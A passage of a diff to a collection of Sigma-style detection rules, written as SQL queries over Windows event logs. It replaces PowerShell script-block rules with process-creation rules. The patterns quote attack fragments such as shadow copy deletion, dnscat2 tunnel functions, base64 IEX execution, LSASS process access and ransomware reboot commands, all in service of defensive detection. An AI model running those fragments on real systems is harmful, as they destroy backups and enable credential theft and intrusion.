Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" - ], + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "status": "experimental", + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes 
LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" - ], + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", + "status": "experimental", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate scripts that use IEX" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", - "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" ], "level": "high", "rule": 
[ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "proc_creation_win_malware_snatch_ransomware.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", - "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "status": "test", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "Malicious ShellIntel PowerShell Commandlets", - "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", "status": "test", - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + 
"attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "status": "experimental", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Admin activity", + 
"Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '4688' 
AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "status": "test", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new 
EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "title": 
"Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "author": "frack113", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": 
"c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine 
LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP 